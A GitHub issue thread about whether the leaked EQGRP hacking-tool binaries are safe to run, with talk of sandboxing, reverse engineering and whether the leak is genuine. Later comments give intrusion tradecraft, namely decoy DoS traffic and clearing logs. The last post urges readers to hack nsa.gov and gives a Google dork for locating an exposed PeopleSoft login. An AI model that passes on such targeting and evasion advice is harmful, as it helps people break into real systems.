Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Danger-free? #10

Closed
Dawnspire3000 opened this issue Apr 9, 2017 · 76 comments
Closed

Danger-free? #10

Dawnspire3000 opened this issue Apr 9, 2017 · 76 comments

Comments

@Dawnspire3000
Copy link

My Antivirus keeps putting certain binaries into quarantine. Does anyone use all the binaries? Are they really safe? I mean, this is legit but would that stop dangerous files from being in there?
@ghost
Copy link

ghost commented Apr 9, 2017

Nothing in here is "danger free" if you are going to execute random binaries you downloaded from a random github repository you are going to be in a world of pain

@Dawnspire3000
Copy link
Author

Well that's true but again, this appears to not just be some random repository. I just wanted to know if anyone had bad experiences with them or if its working fine

@peterpt
Copy link

peterpt commented Apr 9, 2017
edited
Loading

Some of the binaries are probably to be planted on victim system and are not exploits .
This means that those binaries have already a backdoor implemented .

Other wise it makes no sense antivirus popup warnings on these files if they are only exploits .

Some of these tools are data retrieval tools , this means that victim machine was already prepared before with the backdoor binaries .

A quick look into the shell scripts code give you an idea of what the tool does .
Some tools target specific directories on victim machines .

Running the binaries is not advised if you do not want your system compromised .
Do not thrust in code that you can not read .

@ghost
Copy link

ghost commented Apr 9, 2017

Oh dear.

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

You should reverse engineer the binary first before you execute them

@Dawnspire3000
Copy link
Author

Good idea, I'll work on it

@Tbone-grady
Copy link

Tbone-grady commented Apr 9, 2017
edited
Loading

As @Ekultek said reverse engineering is a good idea, as peterpt formentioned about executing random binaries on your machine as TAO standard procedure states they use a staging server to access their tools integrity and whether or not they need further development. I use an old Linux laptop to access and identify their functions.

I invested in Danderspritz; specific binaries use LP (Listening Post) to connect to Implants. The NSA TAO branch seems to operate like the military and I do suppose it is directly tied too US Cyber command. I went through TAO SOP and to run any operations they have MIT install most of the prerequisites. A Solaris/Windows server 2008 standalone OS for FA servers. But I theorize they mainly use either Solaris or Apache according to the leak during August last year.

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

What you should really do if you don't want to take time to reverse engineer, is sandbox a virtual machine and run each one, make a custom app that will record all the differences made from start to finish and then figure out what each one does from there.

However what @tdog21 said is a brilliant idea, but if you're just looking to get them run, sandbox it, run each one and discover the backtrace of what each one does.

@Tbone-grady
Copy link

Tbone-grady commented Apr 9, 2017
edited
Loading

@Ekultek The only issue is virtual boxes tend to be harder to work with due to their high memory usage and unreliability and Advanced Persistent threats can target the box. But I see your point. Watch the Cisco SIO: Defence in depth on youtube. It involves the castle approach and talks about threat evolution

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

@tdog21 you are correct, but at the same time, you can always get rid of a VM and it's easier to do so then to completely reformat your hard drive. And with a sandbox around it, nothing will get out, unless as you said it's extremely advanced. Which in this case, most of them don't look to advanced

@Tbone-grady
Copy link

@Ekultek good point although I never mentioned its extremely advanced, for me doing it on a different machine allows me to listen to the machines port and see what going on. Plus I do have a slow internet connection where I live, So deleting a VM with up-to-date drivers and software isn't a option for me.

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

Fair enough, either way most of these scripts don't even work. I think we're missing something from them, to be honest. Either way none of this was made by the NSA lol

@Tbone-grady
Copy link

Tbone-grady commented Apr 9, 2017
edited
Loading

@Ekultek I might be able to provide insight into this question I'm planning on a summer internship with their cyber division

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

@tdog21 which question would that be? And how did you manage to land that internship?

@peterpt
Copy link

peterpt commented Apr 9, 2017
edited
Loading

Most tools do a call to jl.command which executes the compiled binary connect.so .

So , reversing the connect.so to original source code will give you an idea how the exploit works , or even if it is an exploit .

if you all look inside this example script :
https://github.com/x0rz/EQGRP/blob/master/archive_files/bin/decftp.sh

at the end of the script jl.command executes that binary to a supposed port 10402 .
basically for what i can see , this tool will retrieve the file pmgrd.Z from a specific server after jl.command is executed .
And if you still look closely to the script , you will see that you already have to know the base directory to where this tool will get that data .

The data will be in an hidden directory inside your base directory that you must specify on executing the script .
Line 26 shows the location of hidden directory inside your base directory
line 32 start ftp and in line 36 is picked up the file from server .

I did not had much time yet to look into these tools more carefully , but you all should be carefull using any tool inside bin directory , because all of them make an execution call to jl.command which uses a pre-compiled binary with extension .so which we do not know nothing about it .

@Tbone-grady
Copy link

@Ekultek I didn't "land it" yet I looked their their career and internship programs and I'm still deciding and

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

@tdog21 what's there to decide man? That's an awesome opportunity, take it with both hands or someone else will bro! Imagine how much you already know, and then imagine what you could learn.

@Tbone-grady
Copy link

@Ekultek Good point I might as well apply

@Tbone-grady
Copy link

@peterpt good point and yes the NSA have their own file extensions for their CNE/CNA branch

@peterpt
Copy link

peterpt commented Apr 9, 2017
edited
Loading

My guess to all these tools is that should be executed inside victim machine and not from outside .

This way have logic why they got them from a compromised system .
Otherwise they had to hack NSA directly .

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

@peterpt either that or we're missing a distro server or something, executing these inside a machine doesn't really make sense, you would need to know the exact layout of their machine in order to work efficiently. However if you executed it from a server, then these might just be the tools to exploit the Cisco servers that got patched

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

So my guess is, these are either bullshit and they threw them together to scare someone, or, we're missing something. However Snowden himself did say something about these and we can't discredit (even though he's very unreliable) Snowden just yet.

@peterpt
Copy link

peterpt commented Apr 9, 2017

Ekultek , there could be mixed stuff .
We will know in next weeks .
When i get some time here i will look more closely , in mean while i believe that a new batch of files will be updated . Maybe some cool stuff come along on next batch of files .

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

I say fuck it guys. @peterpt @tdog21 let's hack the NSA, give them a taste of their own medicine.

@peterpt
Copy link

peterpt commented Apr 9, 2017
edited
Loading

hacking NSA exploit repository would be the same thing as winning the lottery .
Unless you worked there and you have a backdoor login , then it will be a very difficult job to hack them .
Most of what can be achieved to NSA is a ddos , but that will take you to nowhere .

Anyway , if you give a job to 2 persons where each person must do it individually , then you will get different results .
This mean many of the released 0day exploits on exploit-db , NSA did not know about them , they probably have a different approach to a specific program witch uses a different exploit technique .
Te difference between both is that 0day exploits on exploit-db are patched by software companies , while NSA are not patched because software companies do not know yet about that vulnerability .
This way it gives NSA a very big leverage .
However , if you look into github codes you will see that many people create code to violate other persons privacy , while others on github build code to protect those persons .
Only this way i believe things can evolute in programming .

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

@peterpt well I work for the government, I can tell you this much, they are really big on keeping things secure and really like to find what's wrong with everyone else, but when they do find it, they don't really fix it for themselves. Example all those Cisco switches, they may have patched it for everyone else, but did they patch it for their government that didn't tell them about the exploits in the first place? They are under no legal binding contract to not patch them for the NSA. Just because something seems impossible doesn't mean it is. A 12 year old got 400k from Google for finding an exploit once.

@peterpt
Copy link

peterpt commented Apr 9, 2017

See it this way .
Got an open port , if you have an exploit for that service running on that port then you can get in and do whatever you want , otherwise forget it .
Usually hacking on the fly is done by SQL injection points on some webserver , but by default the good stuff is not on the same subnet of the webserver .
Without even mention that you have to route your connection to multiple proxys to not be detected , which these days it is not difficult to bypass to get your rel public ip address .
However , i believe that this subject should not be discussed here on github , but just to finish the comment , a good sysadmin never uses the original firmware of his router , firewall or switch , open source firmwares are the best solution in every perspective .
Again , by default Governments always use original firmwares on their network hardware , which make things more easier to hack .
Most sophisticated attacks to networks are made by multiple people at same time , where 2 or 3 are doing the job to get in while the other 17 are sending controlled dos attacks or testing the website just to fill up the firewall log so the work of those 3 could not be detected easily on realtime .
After those 3 or 1 of them get in , then the first thing they do is to clear the log file from firewall or server so the sysadmin have no idea how did they got inside , and then after their job is done on the victim , they clean the log again .
When sysadmin get a look into server or firewall logs , he will not find anything and at same time he was hacked .
Hackers using this technique , next time they will do it the same way they did before because that vulnerability that they found was not patched because sysadmin have no idea how did they do it .

@Tbone-grady
Copy link

Tbone-grady commented Apr 9, 2017
edited
Loading

@peterpt and your point is...

@Far00K
Copy link

Far00K commented Apr 9, 2017

But if you want to hack NSA you must find the vulnerability they found. If that was that you wanted? And if you want to clean the log you need admin that can take a while and the time you are trying to get root access they will already see the log.

You need to get root access very fast... maybe do some Reconnasissance/ Footprinting and see how often they look on there system to see how much time you have.

Or you hack them without making any strange so the sysadmin react and sees it

@Ekultek
Copy link

Ekultek commented Apr 9, 2017 via email

@marctmiller
Copy link

marctmiller commented Apr 9, 2017 via email

@Tbone-grady
Copy link

@Far00K and @marctmiller zip this horseshit it's getting irritating. Go create a new thread and talk about it in their

@marctmiller
Copy link

marctmiller commented Apr 9, 2017 via email

@Ekultek
Copy link

Ekultek commented Apr 9, 2017
edited
Loading

@marctmiller let's break this down logically really quick. What do we know (or think we know)?

  1. A hacking groups claim to fame is that they hacked an NSA archive containing a bunch of "hacking tools" that don't really do anything.
  2. These tools clearly have a version control system in place or else there would not be a version number in the code.
  3. These "tools" apparently where dumped in reply to Trump bombing Syria, however that doesn't make logical sense, if you wanted to let Trump know you are pissed, just dump his information instead.
  4. We (think) we are missing something from these because most of the tools direct to either a certain IP address, or require a certain server name, if you run them, most of them require an IP to be initialized.
  5. If this REALLY was from the NSA and was IMPORTANT to them, it would have been shut down hours ago, and we would all be being tracked for even being on here because we all made forks of it.

So what this boils down to is this, the NSA either didn't write this, or we don't have all the files.

Now seeing how you're a complete tool who doesn't care what his Github looks like, with his 6 stars and lack of git pushes, let me break it down even further for your feeble mind. The intellectual conversations we are having about the system is that we don't have all the information, I understand this can be hard to follow because you write JS, so let me explain this_code != NSA_WORK (logically) because of the formentioned circumstances. So what we are trying to figure out is what this is, and why it's here. Yes it can be whatever we want it to be, like the fucking moon could be made of cheese, but it's not. So if you're gonna come here and try to put someone down for having a response and a question, please just go away, thanks.

@Far00K
Copy link

Far00K commented Apr 9, 2017

No i dident meant to irritating you. I gote just triggered by marctmiller

@Far00K
Copy link

Far00K commented Apr 9, 2017

I have an idea. We must remember that we are talking about NSA and if this was there files and it was so important they could just shut down github or the sources that are leaking the files out.

@marctmiller
Copy link

marctmiller commented Apr 9, 2017 via email

@Far00K
Copy link

Far00K commented Apr 9, 2017

ok...

@Tbone-grady
Copy link

@Far00K dont worry @marctmiller is just insecure and is trying to assert himeself

@Far00K
Copy link

Far00K commented Apr 9, 2017

Burned

@Ekultek
Copy link

Ekultek commented Apr 9, 2017

@Far00K or he's just extremely dumb. It's one or the other lol.

Anyways @tdog21 I still think we're missing some files. There's gotta be a configuration or something we don't have.

@Far00K
Copy link

Far00K commented Apr 9, 2017

I fink that why shoulde they give all the file. Maby it was just a show of to show they have the files and later they gone ask fore money for the rest.

@marctmiller
Copy link

marctmiller commented Apr 9, 2017 via email

@Far00K
Copy link

Far00K commented Apr 9, 2017

But what do you know, we dont already know (sorry for my english)

@Ekultek
Copy link

Ekultek commented Apr 9, 2017 via email

@Far00K
Copy link

Far00K commented Apr 9, 2017

ok... Im meant the questien to marctmiller

@Far00K
Copy link

Far00K commented Apr 9, 2017

And what do you meen you get paid to do this @Ekultek

@Ekultek
Copy link

Ekultek commented Apr 10, 2017

@marctmiller nobody said anything about not being able to run them. They just don't really do anything when you do run them.

@marctmiller
Copy link

marctmiller commented Apr 10, 2017 via email

@NoahGWood
Copy link

@Ekultek
The NSA would have no legal right to "track you down" and van you for forking this github or scouring the source. If you do not hold security clearance you are not prohibited from viewing classified/secret/top-secret/xyasdf information that was released publicly, even if the information is still classified and the people who released it did so illegally.

If you DO hold a security clearance on the other hand, you could get in trouble for viewing these files.

Also, I wouldn't say they don't do anything. There is exploits, all manner of rootkits, and more binaries than a single person could pour through in a week. The fact that a few python scripts require connecting back to other servers is irrelevant. The exploits are still there and still able to be reverse engineered.

@Ekultek
Copy link

Ekultek commented Apr 10, 2017 via email

@Far00K
Copy link

Far00K commented Apr 10, 2017

I look in to a file and one of them, hade a instruction

@Far00K
Copy link

Far00K commented Apr 10, 2017

It can meen that it's instrution to hack something

@ghost
Copy link

ghost commented Apr 10, 2017

Thanks for filling up my mailbox with your edgy comments 👍

@Far00K
Copy link

Far00K commented Apr 10, 2017

De nada

@pussyknit
Copy link

Are you guys kidding me with this shit? Of course there are different versions. The NSA keeps a retarded index of hardware profiles with work arounds and exploits for each type of hardware profile. Shit this stuff is fucking played out like acid wash. This thread was a Yawn fest. You guys should try taking drugs or get some HOOKERS and loosen up. This shit is real but these versions are not the latest. This is old shit. BTW fuck working for those commie fucks. They wouldn't hire anyone from this thread. You ladies would never make the cut. These clowns only pull internet consortium, ivy league motherfuckers that are robots with a spotless history. You chronic masterbaters need to stay in school. Maybe in about forty years you can get a job at the NSA pushing a broom. Fuck the pigs. America is burnt

@Atavic
Copy link

Atavic commented Jul 19, 2017

@Dawnspire3000 Just close this trollfest of an issue, please.

@Atavic
Copy link

Atavic commented Jul 19, 2017

Thank you.

@ghost
Copy link

ghost commented Jul 23, 2017
edited by ghost
Loading

If you want to hack the NSA, best bet is start here:

NSA dotgov exposes their Oracle Peoplesoft login ~ LOL

http://i.magaimg.net/img/10yu.png

As recently as May, you could have used this Peoplesoft RCE to pwn NSA dotgov ~ LOL

http://i.magaimg.net/img/10yt.png

Hint: Google site:nsa.gov inurl:psp

http://i.magaimg.net/img/10yv.png

I encourage you to poke around NSA dotgov, there's all kinds of little fuckups they ignored.
If your Autism can exceed the NSA's autism, you'll find something they put in that they didn't know that you could do.
More important than any exploits, I strongly encourage you to read their small mountain of pdfs of declassified historical documents covering every topic from Nerd-Heaven imaginable.
It doesn't matter which pdfs you read, nor which order, just pick anything you find personally interesting and start digging in.

Btw, you have my full permission to hack NSA dotgov anyway that you can find--if you're clever enough to slap the face of supreme hubris from jackasses who said "Nothing is Beyond Our Reach" then you deserve all the Street Fame for cuckshaming them.

Don't be intimidated by their $72 BILLION Black Budget and GODMODE. At least 97% of it is PURE WASTE, and those drooling mouth breathing gubbmint GS-13's could't tell their asshole from a hole in the ground unless there was an Official Manual with a list of checkboxes for them to blindly obey how to do it.
Always remember the Federales can barely light up 2 neurons between themselves and that's by design.
Do you want a goddamn hyper efficient govt that could go Super-1984 in a snap of the fingers?
Hell no! Slapstick redundancy, gross incompetence, $600 Park outhouse toilet seats, $1000 claw hammers and "accidentally losing" $2.2 BILLION in Hummers to ISIS in Mosul is the only thing keeping us Free from a Cyber Dystopian Orwellian Nightmare!

Anyways, so I tweeted more about how to hack NSA:

http://i.magaimg.net/img/10yx.png

And more...

http://i.magaimg.net/img/10yz.png

And then ironically, within minutes of tweeting, I got suspended ~ LOL

http://i.magaimg.net/img/10z0.png

Which I take as a badge of honor btw. If I was deemed enough of a cyber threat to be targetted in real-time and shut_it_down_the_goyim_know.jpg just for fucking around with Google Dorking and poking NSA dotgov with a stick for fun during an idle 15 minutes, imagine the real exploitation that's possible if you properly case the joint and bring your full hamburgler tool kit?

Perhaps this little incident had something to do with a not very talkative FBI Special Agent calling me a month later and asking me if I knew anything about the Shadowbroker and a plot to re-purpose EQGRP viruses to crash the entire Internet just to hit glass jaw NSA on the chin.

(btw just in case jerks don't like my mean words here, does it look like i care if this throw away GH acct also gets suspended? Once you're marked as Enemy of the State like me, every acct you have gets suspended every week, which you Deal_With_It.gif and interpret your own censorship as damage and route around it.)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
10 participants
@marctmiller @peterpt @Ekultek @Atavic @Tbone-grady @Dawnspire3000 @NoahGWood @Far00K @pussyknit and others